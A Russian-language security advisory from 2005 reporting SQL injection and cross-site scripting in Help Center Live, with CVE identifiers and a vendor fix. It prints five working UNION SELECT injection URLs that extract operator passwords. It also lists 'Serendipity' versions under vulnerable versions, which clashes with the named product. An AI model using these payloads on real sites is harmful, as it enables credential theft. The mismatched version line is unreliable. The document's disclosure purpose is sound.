SQL-инъекция и межсайтовый скриптинг в Help Center Live

Дата публикации:
20.05.2005
Всего просмотров:
1209
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-1672
CVE-2005-1673
CVE-2005-1674
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Help Center Live 1.x
Уязвимые версии: Serendipity версии до 0.8.1

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

SQL-инъекция возможна при выключенной опции magic_quotes_gpc в конфигурационном файле php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://[target]/support/faq/index.php?x=f&id=-
99'%20UNION%20SELECT%200, 0,operator,
password%20FROM%20hcl_operators%20WHERE%201/*

http://[tar get]/support/tt/view.php?tid=-99'%20
UNION%20SELECT%200,0,0,operator,password,
0,0,0,0,0%20FROM%20hcl_operators%20WHERE%201/*

http://[target]/support/tt/download.php?f id=-99'%20
UNION%20SELECT%200,0,0,password,0,operator,0,
0%20FROM%20hcl_operators%20WHERE%20id='1

http://[target]/support/lh/icon.php?status=-99' UNION
SELECT password,password FROM hcl_operators WHERE id=1/*

http://[target]/support/lh/chat_download.php?fid=-99'
UNION SELECT password, operator,password
FROM hcl_operators WHERE id=1/*

Межсайтовый скриптинг возможен из-за недостаточной фильтрации HTML символов в некоторых переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителей: www.helpcentrelive.com

Решение: Установите исправление от производителя.

или введите имя

CAPTCHA